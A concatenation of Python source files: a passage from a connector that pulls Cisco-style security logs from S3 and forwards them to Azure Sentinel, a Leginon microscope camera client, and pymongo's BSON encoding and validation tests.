ts_from = datetime.datetime.utcnow() - datetime.timedelta(minutes=TIME_INTERVAL_MINUTES + 1)
ts_to = datetime.datetime.utcnow() - datetime.timedelta(minutes=1)
ts_from = ts_from.replace(tzinfo=datetime.timezone.utc, second=0, microsecond=0)
ts_to = ts_to.replace(tzinfo=datetime.timezone.utc, second=0, microsecond=0)
return ts_from, ts_to
def _make_objects_list_request(self, marker='', prefix=''):
response = self.s3.list_objects(
Bucket=self.aws_s3_bucket,
Marker=marker,
Prefix=prefix
)
try:
response_code = response.get('ResponseMetadata', {}).get('HTTPStatusCode', None)
if response_code == 200:
return response
else:
raise Exception('HTTP Response Code - {}'.format(response_code))
except Exception as err:
logging.error('Error while getting objects list - {}'.format(err))
raise Exception
def get_files_list(self, ts_from, ts_to):
files = []
folders = ['dnslogs', 'proxylogs', 'iplogs', 'cloudfirewalllogs', 'cdfwlogs']
if self.aws_s3_prefix:
folders = [self.aws_s3_prefix + folder for folder in folders]
marker_end = (ts_from - datetime.timedelta(minutes=60)).strftime("/%Y-%m-%d/%Y-%m-%d-%H-%M")
for folder in folders:
marker = folder + marker_end
while True:
response = self._make_objects_list_request(marker=marker, prefix=folder)
for file_obj in response.get('Contents', []):
if ts_to > file_obj['LastModified'] >= ts_from:
files.append(file_obj)
if response['IsTruncated'] is True:
marker = response['Contents'][-1]['Key']
else:
break
return self.sort_files_by_date(files)
def download_obj(self, key):
logging.info('Started downloading {}'.format(key))
res = self.s3.get_object(Bucket=self.aws_s3_bucket, Key=key)
try:
response_code = res.get('ResponseMetadata', {}).get('HTTPStatusCode', None)
if response_code == 200:
body = res['Body']
data = body.read()
logging.info('File {} downloaded'.format(key))
return data
else:
logging.error('Error while getting object {}. HTTP Response Code - {}'.format(key, response_code))
except Exception as err:
logging.error('Error while getting object {} - {}'.format(key, err))
def unpack_file(self, downloaded_obj, key):
try:
file_obj = io.BytesIO(downloaded_obj)
csv_file = gzip.GzipFile(fileobj=file_obj).read().decode()
return csv_file
except Exception as err:
logging.error('Error while unpacking file {} - {}'.format(key, err))
@staticmethod
def convert_empty_string_to_null_values(d: dict):
for k, v in d.items():
if v == '' or (isinstance(v, list) and len(v) == 1 and v[0] == ''):
d[k] = None
return d
@staticmethod
def format_date(date_string, input_format, output_format):
try:
date = datetime.datetime.strptime(date_string, input_format)
date_string = date.strftime(output_format)
except Exception:
pass
return date_string
def parse_csv_ip(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 7:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Identity': row[1],
'Source IP': row[2],
'Source Port': row[3],
'Destination IP': row[4],
'Destination Port': row[5],
'Categories': row[6].split(',')
}
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'iplogs'
yield event
def parse_csv_proxy(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 21:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Identities': row[1],
'Internal IP': row[2],
'External IP': row[3],
'Destination IP': row[4],
'Content Type': row[5],
'Verdict': row[6],
'URL': row[7],
'Referer': row[8],
'userAgent': row[9],
'statusCode': row[10],
'requestSize': row[11],
'responseSize': row[12],
'responseBodySize': row[13],
'SHA-SHA256': row[14],
'Categories': row[15].split(','),
'AVDetections': row[16].split(','),
'PUAs': row[17].split(','),
'AMP Disposition': row[18],
'AMP Malware Name': row[19],
'AMP Score': row[20]
}
try:
event['Blocked Categories'] = row[21].split(',')
except IndexError:
pass
int_fields = [
'requestSize',
'responseSize',
'responseBodySize'
]
for field in int_fields:
try:
event[field] = int(event[field])
except Exception:
pass
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'proxylogs'
yield event
def parse_csv_dns(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 10:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Policy Identity': row[1],
'Identities': row[2].split(','),
'InternalIp': row[3],
'ExternalIp': row[4],
'Action': row[5],
'QueryType': row[6],
'ResponseCode': row[7],
'Domain': row[8],
'Categories': row[9].split(',')
}
try:
event['Policy Identity Type'] = row[10]
except IndexError:
pass
try:
event['Identity Types'] = row[11].split(',')
except IndexError:
pass
try:
event['Blocked Categories'] = row[12].split(',')
except IndexError:
pass
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'dnslogs'
yield event
def parse_csv_cdfw(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 14:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'originId': row[1],
'Identity': row[2],
'Identity Type': row[3],
'Direction': row[4],
'ipProtocol': row[5],
'packetSize': row[6],
'sourceIp': row[7],
'sourcePort': row[8],
'destinationIp': row[9],
'destinationPort': row[10],
'dataCenter': row[11],
'ruleId': row[12],
'verdict': row[13]
}
else:
event = {"message": convert_list_to_csv_line(row)}
event['EventType'] = 'cloudfirewalllogs'
yield event
@staticmethod
def sort_files_by_date(ls):
return sorted(ls, key=lambda k: k['LastModified'])
def process_file(self, obj, dest):
t0 = time.time()
key = obj['Key']
if 'csv.gz' in key.lower():
downloaded_obj = self.download_obj(key)
csv_file = self.unpack_file(downloaded_obj, key)
parser_func = None
if 'dnslogs' in key.lower():
parser_func = self.parse_csv_dns
elif 'proxylogs' in key.lower():
parser_func = self.parse_csv_proxy
elif 'iplogs' in key.lower():
parser_func = self.parse_csv_ip
elif 'cloudfirewalllogs' in key.lower() or 'cdfwlogs' in key.lower():
parser_func = self.parse_csv_cdfw
if parser_func:
file_events = 0
for event in parser_func(csv_file):
dest.send(event)
file_events += 1
self.total_events += 1
logging.info('File processed | TIME {} sec | SIZE {} MB | Events {} | Key {}'.format(round(time.time() - t0, 2), round(obj['Size'] / 10**6, 2), file_events, key))
class AzureSentinelConnector:
def __init__(self, customer_id, shared_key, log_type, queue_size=200, bulks_number=10, queue_size_bytes=25 * (2**20)):
self.customer_id = customer_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.bulks_number = bulks_number
self.queue_size_bytes = queue_size_bytes
self._queue = []
self._bulks_list = []
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
def send(self, event):
self._queue.append(event)
if len(self._queue) >= self.queue_size:
self.flush(force=False)
def flush(self, force=True):
self._bulks_list.append(self._queue)
if force:
self._flush_bulks()
else:
if len(self._bulks_list) >= self.bulks_number:
self._flush_bulks()
self._queue = []
def _flush_bulks(self):
jobs = []
for queue in self._bulks_list:
if queue:
queue_list = self._split_big_request(queue)
for q in queue_list:
jobs.append(Thread(target=self._post_data, args=(self.customer_id, self.shared_key, q, self.log_type, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
self._bulks_list = []
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
self.flush()
def _build_signature(self, customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def _post_data(self, customer_id, shared_key, body, log_type):
events_number = len(body)
body = json.dumps(body)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = 'https://' + customer_id + '.ods.opinsights.azure.com' + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
logging.info('{} events have been successfully sent to Azure Sentinel'.format(events_number))
self.successfull_sent_events_number += events_number
else:
logging.error("Error during sending events to Azure Sentinel. Response code: {}".format(response.status_code))
self.failed_sent_events_number += events_number
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
|
cameraclient.py
|
from leginon import leginondata
import threading
import time
# Change this to False to avoid automated screen lifting
AUTO_SCREEN_UP = True
AUTO_COLUMN_VALVE_OPEN = True
default_settings = leginondata.CameraSettingsData()
default_settings['dimension'] = {'x': 1024, 'y': 1024}
default_settings['offset'] = {'x': 0, 'y': 0}
default_settings['binning'] = {'x': 1, 'y': 1}
default_settings['exposure time'] = 200
default_settings['save frames'] = False
default_settings['frame time'] = 200
default_settings['align frames'] = False
default_settings['align filter'] = 'None'
default_settings['use frames'] = ''
default_settings['readout delay'] = 0
class CameraClient(object):
def __init__(self):
self.exposure_start_event = threading.Event()
self.exposure_done_event = threading.Event()
self.readout_done_event = threading.Event()
self.position_camera_done_event = threading.Event()
def clearCameraEvents(self):
self.exposure_start_event.clear()
self.exposure_done_event.clear()
self.readout_done_event.clear()
self.position_camera_done_event.clear()
def waitExposureDone(self):
self.exposure_done_event.wait()
def waitReadoutDone(self):
self.readout_done_event.wait()
def waitPositionCameraDone(self):
self.position_camera_done_event.wait()
def startExposureTimer(self):
'''
We want to approximate when the CCD exposure is done,
but not wait for the readout, which can take a lot longer.
This will set a timer that will generate an event when
we think the exposure should be done.
'''
extratime = 1.0
self.logger.debug('Extra time for exposure: %s (tune this lower to save time)' % (extratime,))
exposure_seconds = self.instrument.ccdcamera.ExposureTime / 1000.0
waittime = exposure_seconds + extratime
t = threading.Timer(waittime, self.exposure_done_event.set)
self.exposure_start_event.set()
t.start()
def positionCamera(self,camera_name=None, allow_retracted=False):
'''
Position the camera ready for acquisition
'''
orig_camera_name = self.instrument.getCCDCameraName()
if camera_name is not None:
self.instrument.setCCDCamera(camera_name)
hosts = map((lambda x: self.instrument.ccdcameras[x].Hostname),self.instrument.ccdcameras.keys())
## Retract the cameras that are above this one (higher zplane)
## or on the same host but lower because the host often
## retract the others regardless of the position but not include
## that in the timing. Often get blank image as a result
for name,cam in self.instrument.ccdcameras.items():
if cam.Zplane > self.instrument.ccdcamera.Zplane or (hosts.count(cam.Hostname) > 1 and cam.Zplane < self.instrument.ccdcamera.Zplane):
try:
if cam.Inserted:
cam.Inserted = False
self.logger.info('retracted camera: %s' % (name,))
except:
pass
## insert the current camera, unless allow_retracted
if not allow_retracted:
try:
inserted = self.instrument.ccdcamera.Inserted
except:
inserted = True
if not inserted:
camname = self.instrument.getCCDCameraName()
self.logger.info('inserting camera: %s' % (camname,))
self.instrument.ccdcamera.Inserted = True
if camera_name is not None:
# set current camera back in case of side effect
self.instrument.setCCDCamera(orig_camera_name)
self.position_camera_done_event.set()
def liftScreenBeforeExposure(self,exposure_type='normal'):
'''
Life main screen if it is down for non-dark exposure
'''
if exposure_type == 'dark':
# Do not do anything if a dark image is about to be acquired
return
try:
state = self.instrument.tem.MainScreenPosition
except:
state = 'down'
pass
if state != 'up':
self.logger.info('Lifting screen for camera exposure....')
self.instrument.tem.MainScreenPosition = 'up'
def openColumnValveBeforeExposure(self,exposure_type='normal'):
'''
Open Column Valve if it is closed for non-dark exposure
'''
if exposure_type == 'dark':
# Do not do anything if a dark image is about to be acquired
return
try:
state = self.instrument.tem.ColumnValvePosition
except:
state = 'closed'
pass
if state != 'open':
self.logger.info('Open Column Valve for camera exposure....')
self.instrument.tem.ColumnValvePosition = 'open'
def dummy(self):
pass
def prepareToAcquire(self,allow_retracted=False,exposure_type='normal'):
t1 = threading.Thread(target=self.positionCamera(allow_retracted=allow_retracted))
if AUTO_SCREEN_UP:
t2 = threading.Thread(target=self.liftScreenBeforeExposure(exposure_type))
else:
t2 = threading.Thread(target=self.dummy())
if AUTO_COLUMN_VALVE_OPEN:
t3 = threading.Thread(target=self.openColumnValveBeforeExposure(exposure_type))
else:
t3 = threading.Thread(target=self.dummy())
while t1.isAlive() or t2.isAlive() or t3.isAlive():
time.sleep(0.5)
def acquireCameraImageData(self, scopeclass=leginondata.ScopeEMData, allow_retracted=False, type='normal'):
'''Acquire a raw image from the currently configured CCD camera'''
self.prepareToAcquire(allow_retracted,exposure_type=type)
## set type to normal or dark
self.instrument.ccdcamera.ExposureType = type
imagedata = leginondata.CameraImageData()
imagedata['session'] = self.session
## make sure shutter override is activated
try:
self.instrument.tem.ShutterControl = True
except:
# maybe tem has no such function
pass
## acquire image, get new scope/camera params
try:
scopedata = self.instrument.getData(scopeclass)
except:
raise
#cameradata_before = self.instrument.getData(leginondata.CameraEMData)
imagedata['scope'] = scopedata
self.startExposureTimer()
imagedata['image'] = self.instrument.ccdcamera.Image
cameradata_after = self.instrument.getData(leginondata.CameraEMData)
## only using cameradata_after, not cameradata_before
imagedata['camera'] = cameradata_after
## duplicating 'use frames' here because we may reuse same
## CameraEMData for multiple versions of AcquisitionImageData
imagedata['use frames'] = cameradata_after['use frames']
self.readout_done_event.set()
return imagedata
|
test_bson.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the bson module."""
import array
import collections
import datetime
import mmap
import os
import pickle
import re
import sys
import tempfile
import uuid
from collections import OrderedDict, abc
from io import BytesIO
sys.path[0:0] = [""]
from test import qcheck, unittest
from test.utils import ExceptionCatchingThread
import bson
from bson import (
BSON,
EPOCH_AWARE,
Regex,
decode,
decode_all,
decode_file_iter,
decode_iter,
encode,
is_valid,
)
from bson.binary import Binary, UuidRepresentation
from bson.code import Code
from bson.codec_options import CodecOptions
from bson.dbref import DBRef
from bson.errors import InvalidBSON, InvalidDocument
from bson.int64 import Int64
from bson.max_key import MaxKey
from bson.min_key import MinKey
from bson.objectid import ObjectId
from bson.son import SON
from bson.timestamp import Timestamp
from bson.tz_util import FixedOffset, utc
class NotADict(abc.MutableMapping):
"""Non-dict type that implements the mapping protocol."""
def __init__(self, initial=None):
if not initial:
self._dict = {}
else:
self._dict = initial
def __iter__(self):
return iter(self._dict)
def __getitem__(self, item):
return self._dict[item]
def __delitem__(self, item):
del self._dict[item]
def __setitem__(self, item, value):
self._dict[item] = value
def __len__(self):
return len(self._dict)
def __eq__(self, other):
if isinstance(other, abc.Mapping):
return all(self.get(k) == other.get(k) for k in self)
return NotImplemented
def __repr__(self):
return "NotADict(%s)" % repr(self._dict)
class DSTAwareTimezone(datetime.tzinfo):
def __init__(self, offset, name, dst_start_month, dst_end_month):
self.__offset = offset
self.__dst_start_month = dst_start_month
self.__dst_end_month = dst_end_month
self.__name = name
def _is_dst(self, dt):
return self.__dst_start_month <= dt.month <= self.__dst_end_month
def utcoffset(self, dt):
return datetime.timedelta(minutes=self.__offset) + self.dst(dt)
def dst(self, dt):
if self._is_dst(dt):
return datetime.timedelta(hours=1)
return datetime.timedelta(0)
def tzname(self, dt):
return self.__name
class TestBSON(unittest.TestCase):
def assertInvalid(self, data):
self.assertRaises(InvalidBSON, decode, data)
def check_encode_then_decode(self, doc_class=dict, decoder=decode, encoder=encode):
# Work around http://bugs.jython.org/issue1728
if sys.platform.startswith("java"):
doc_class = SON
def helper(doc):
self.assertEqual(doc, (decoder(encoder(doc_class(doc)))))
self.assertEqual(doc, decoder(encoder(doc)))
helper({})
helper({"test": "hello"})
self.assertTrue(isinstance(decoder(encoder({"hello": "world"}))["hello"], str))
helper({"mike": -10120})
helper({"long": Int64(10)})
helper({"really big long": 2147483648})
helper({"hello": 0.0013109})
helper({"something": True})
helper({"false": False})
helper({"an array": [1, True, 3.8, "world"]})
helper({"an object": doc_class({"test": "something"})})
helper({"a binary": Binary(b"test", 100)})
helper({"a binary": Binary(b"test", 128)})
helper({"a binary": Binary(b"test", 254)})
helper({"another binary": Binary(b"test", 2)})
helper(SON([("test dst", datetime.datetime(1993, 4, 4, 2))]))
helper(SON([("test negative dst", datetime.datetime(1, 1, 1, 1, 1, 1))]))
helper({"big float": float(10000000000)})
helper({"ref": DBRef("coll", 5)})
helper({"ref": DBRef("coll", 5, foo="bar", bar=4)})
helper({"ref": DBRef("coll", 5, "foo")})
helper({"ref": DBRef("coll", 5, "foo", foo="bar")})
helper({"ref": Timestamp(1, 2)})
helper({"foo": MinKey()})
helper({"foo": MaxKey()})
helper({"$field": Code("function(){ return true; }")})
helper({"$field": Code("return function(){ return x; }", scope={"x": False})})
def encode_then_decode(doc):
return doc_class(doc) == decoder(encode(doc), CodecOptions(document_class=doc_class))
qcheck.check_unittest(self, encode_then_decode, qcheck.gen_mongo_dict(3))
def test_encode_then_decode(self):
self.check_encode_then_decode()
def test_encode_then_decode_any_mapping(self):
self.check_encode_then_decode(doc_class=NotADict)
def test_encode_then_decode_legacy(self):
self.check_encode_then_decode(
encoder=BSON.encode, decoder=lambda *args: BSON(args[0]).decode(*args[1:])
)
def test_encode_then_decode_any_mapping_legacy(self):
self.check_encode_then_decode(
doc_class=NotADict,
encoder=BSON.encode,
decoder=lambda *args: BSON(args[0]).decode(*args[1:]),
)
def test_encoding_defaultdict(self):
dct = collections.defaultdict(dict, [("foo", "bar")]) # type: ignore[arg-type]
encode(dct)
self.assertEqual(dct, collections.defaultdict(dict, [("foo", "bar")]))
def test_basic_validation(self):
self.assertRaises(TypeError, is_valid, 100)
self.assertRaises(TypeError, is_valid, "test")
self.assertRaises(TypeError, is_valid, 10.4)
self.assertInvalid(b"test")
# the simplest valid BSON document
self.assertTrue(is_valid(b"\x05\x00\x00\x00\x00"))
self.assertTrue(is_valid(BSON(b"\x05\x00\x00\x00\x00")))
# failure cases
self.assertInvalid(b"\x04\x00\x00\x00\x00")
self.assertInvalid(b"\x05\x00\x00\x00\x01")
self.assertInvalid(b"\x05\x00\x00\x00")
self.assertInvalid(b"\x05\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x07\x00\x00\x00\x02a\x00\x78\x56\x34\x12")
self.assertInvalid(b"\x09\x00\x00\x00\x10a\x00\x05\x00")
self.assertInvalid(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x13\x00\x00\x00\x02foo\x00" b"\x04\x00\x00\x00bar\x00\x00")
self.assertInvalid(
b"\x18\x00\x00\x00\x03foo\x00\x0f\x00\x00" b"\x00\x10bar\x00\xff\xff\xff\x7f\x00\x00"
)
self.assertInvalid(
b"\x15\x00\x00\x00\x03foo\x00\x0c" b"\x00\x00\x00\x08bar\x00\x01\x00\x00"
)
self.assertInvalid(
b"\x1c\x00\x00\x00\x03foo\x00"
b"\x12\x00\x00\x00\x02bar\x00"
b"\x05\x00\x00\x00baz\x00\x00\x00"
)
self.assertInvalid(b"\x10\x00\x00\x00\x02a\x00" b"\x04\x00\x00\x00abc\xff\x00")
def test_bad_string_lengths(self):
self.assertInvalid(b"\x0c\x00\x00\x00\x02\x00" b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x12\x00\x00\x00\x02\x00" b"\xff\xff\xff\xfffoobar\x00\x00")
self.assertInvalid(b"\x0c\x00\x00\x00\x0e\x00" b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x12\x00\x00\x00\x0e\x00" b"\xff\xff\xff\xfffoobar\x00\x00")
self.assertInvalid(
b"\x18\x00\x00\x00\x0c\x00" b"\x00\x00\x00\x00\x00RY\xb5j" b"\xfa[\xd8A\xd6X]\x99\x00"
)
self.assertInvalid(
b"\x1e\x00\x00\x00\x0c\x00"
b"\xff\xff\xff\xfffoobar\x00"
b"RY\xb5j\xfa[\xd8A\xd6X]\x99\x00"
)
self.assertInvalid(b"\x0c\x00\x00\x00\r\x00" b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x0c\x00\x00\x00\r\x00" b"\xff\xff\xff\xff\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\x01\x00\x00"
b"\x00\x00\x00\x00"
)
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\xff\xff"
b"\xff\xff\x00\x0c\x00\x00"
b"\x00\x02\x00\x01\x00\x00"
b"\x00\x00\x00\x00"
)
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x01\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\x00\x00\x00"
b"\x00\x00\x00\x00"
)
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x01\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\xff\xff\xff"
b"\xff\x00\x00\x00"
)
def test_random_data_is_not_bson(self):
qcheck.check_unittest(
self, qcheck.isnt(is_valid), qcheck.gen_string(qcheck.gen_range(0, 40))
)
def test_basic_decode(self):
self.assertEqual(
{"test": "hello world"},
decode(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74\x00\x0C"
b"\x00\x00\x00\x68\x65\x6C\x6C\x6F\x20\x77\x6F"
b"\x72\x6C\x64\x00\x00"
),
)
self.assertEqual(
[{"test": "hello world"}, {}],
decode_all(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"
),
)
self.assertEqual(
[{"test": "hello world"}, {}],
list(
decode_iter(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"
)
),
)
self.assertEqual(
[{"test": "hello world"}, {}],
list(
decode_file_iter(
BytesIO(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"
)
)
),
)
def test_decode_all_buffer_protocol(self):
docs = [{"foo": "bar"}, {}]
bs = b"".join(map(encode, docs)) # type: ignore[arg-type]
self.assertEqual(docs, decode_all(bytearray(bs)))
self.assertEqual(docs, decode_all(memoryview(bs)))
self.assertEqual(docs, decode_all(memoryview(b"1" + bs + b"1")[1:-1]))
self.assertEqual(docs, decode_all(array.array("B", bs)))
with mmap.mmap(-1, len(bs)) as mm:
mm.write(bs)
mm.seek(0)
self.assertEqual(docs, decode_all(mm))
def test_decode_buffer_protocol(self):
doc = {"foo": "bar"}
bs = encode(doc)
self.assertEqual(doc, decode(bs))
self.assertEqual(doc, decode(bytearray(bs)))
self.assertEqual(doc, decode(memoryview(bs)))
self.assertEqual(doc, decode(memoryview(b"1" + bs + b"1")[1:-1]))
self.assertEqual(doc, decode(array.array("B", bs)))
with mmap.mmap(-1, len(bs)) as mm:
mm.write(bs)
mm.seek(0)
self.assertEqual(doc, decode(mm))
def test_invalid_decodes(self):
# Invalid object size (not enough bytes in document for even
# an object size of first object.
# NOTE: decode_all and decode_iter don't care, not sure if they should?
self.assertRaises(InvalidBSON, list, decode_file_iter(BytesIO(b"\x1B")))
bad_bsons = [
# An object size that's too small to even include the object size,
# but is correctly encoded, along with a correct EOO (and no data).
b"\x01\x00\x00\x00\x00",
# One object, but with object size listed smaller than it is in the
# data.
(
b"\x1A\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"
),
# One object, missing the EOO at the end.
(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00"
),
# One object, sized correctly, with a spot for an EOO, but the EOO
# isn't 0x00.
(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\xFF"
),
]
for i, data in enumerate(bad_bsons):
msg = "bad_bson[{}]".format(i)
with self.assertRaises(InvalidBSON, msg=msg):
decode_all(data)
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_iter(data))
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_file_iter(BytesIO(data)))
with tempfile.TemporaryFile() as scratch:
scratch.write(data)
scratch.seek(0, os.SEEK_SET)
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_file_iter(scratch))
def test_invalid_field_name(self):
# Decode a truncated field
with self.assertRaises(InvalidBSON) as ctx:
decode(b"\x0b\x00\x00\x00\x02field\x00")
# Assert that the InvalidBSON error message is not empty.
self.assertTrue(str(ctx.exception))
def test_data_timestamp(self):
self.assertEqual(
{"test": Timestamp(4, 20)},
decode(
b"\x13\x00\x00\x00\x11\x74\x65\x73\x74\x00\x14" b"\x00\x00\x00\x04\x00\x00\x00\x00"
),
)
def test_basic_encode(self):
self.assertRaises(TypeError, encode, 100)
self.assertRaises(TypeError, encode, "hello")
self.assertRaises(TypeError, encode, None)
self.assertRaises(TypeError, encode, [])
self.assertEqual(encode({}), BSON(b"\x05\x00\x00\x00\x00"))
self.assertEqual(encode({}), b"\x05\x00\x00\x00\x00")
self.assertEqual(
encode({"test": "hello world"}),
b"\x1B\x00\x00\x00\x02\x74\x65\x73\x74\x00\x0C\x00"
b"\x00\x00\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C"
b"\x64\x00\x00",
)
self.assertEqual(
encode({"mike": 100}),
b"\x0F\x00\x00\x00\x10\x6D\x69\x6B\x65\x00\x64\x00" b"\x00\x00\x00",
)
self.assertEqual(
encode({"hello": 1.5}),
b"\x14\x00\x00\x00\x01\x68\x65\x6C\x6C\x6F\x00\x00" b"\x00\x00\x00\x00\x00\xF8\x3F\x00",
)
self.assertEqual(
encode({"true": True}), b"\x0C\x00\x00\x00\x08\x74\x72\x75\x65\x00\x01\x00"
)
self.assertEqual(
encode({"false": False}), b"\x0D\x00\x00\x00\x08\x66\x61\x6C\x73\x65\x00\x00" b"\x00"
)
self.assertEqual(
encode({"empty": []}),
b"\x11\x00\x00\x00\x04\x65\x6D\x70\x74\x79\x00\x05" b"\x00\x00\x00\x00\x00",
)
self.assertEqual(
encode({"none": {}}),
b"\x10\x00\x00\x00\x03\x6E\x6F\x6E\x65\x00\x05\x00" b"\x00\x00\x00\x00",
)
self.assertEqual(
encode({"test": Binary(b"test", 0)}),
b"\x14\x00\x00\x00\x05\x74\x65\x73\x74\x00\x04\x00" b"\x00\x00\x00\x74\x65\x73\x74\x00",
)
self.assertEqual(
encode({"test": Binary(b"test", 2)}),
b"\x18\x00\x00\x00\x05\x74\x65\x73\x74\x00\x08\x00"
b"\x00\x00\x02\x04\x00\x00\x00\x74\x65\x73\x74\x00",
)
self.assertEqual(
encode({"test": Binary(b"test", 128)}),
b"\x14\x00\x00\x00\x05\x74\x65\x73\x74\x00\x04\x00" b"\x00\x00\x80\x74\x65\x73\x74\x00",
)
self.assertEqual(encode({"test": None}), b"\x0B\x00\x00\x00\x0A\x74\x65\x73\x74\x00\x00")
self.assertEqual(
encode({"date": datetime.datetime(2007, 1, 8, 0, 30, 11)}),
b"\x13\x00\x00\x00\x09\x64\x61\x74\x65\x00\x38\xBE" b"\x1C\xFF\x0F\x01\x00\x00\x00",
)
self.assertEqual(
encode({"regex": re.compile(b"a*b", re.IGNORECASE)}),
b"\x12\x00\x00\x00\x0B\x72\x65\x67\x65\x78\x00\x61" b"\x2A\x62\x00\x69\x00\x00",
)
self.assertEqual(
encode({"$where": Code("test")}),
b"\x16\x00\x00\x00\r$where\x00\x05\x00\x00\x00test" b"\x00\x00",
)
self.assertEqual(
encode({"$field": Code("function(){ return true;}", scope=None)}),
b"+\x00\x00\x00\r$field\x00\x1a\x00\x00\x00" b"function(){ return true;}\x00\x00",
)
self.assertEqual(
encode({"$field": Code("return function(){ return x; }", scope={"x": False})}),
b"=\x00\x00\x00\x0f$field\x000\x00\x00\x00\x1f\x00"
b"\x00\x00return function(){ return x; }\x00\t\x00"
b"\x00\x00\x08x\x00\x00\x00\x00",
)
unicode_empty_scope = Code("function(){ return 'héllo';}", {})
self.assertEqual(
encode({"$field": unicode_empty_scope}),
b"8\x00\x00\x00\x0f$field\x00+\x00\x00\x00\x1e\x00"
b"\x00\x00function(){ return 'h\xc3\xa9llo';}\x00\x05"
b"\x00\x00\x00\x00\x00",
)
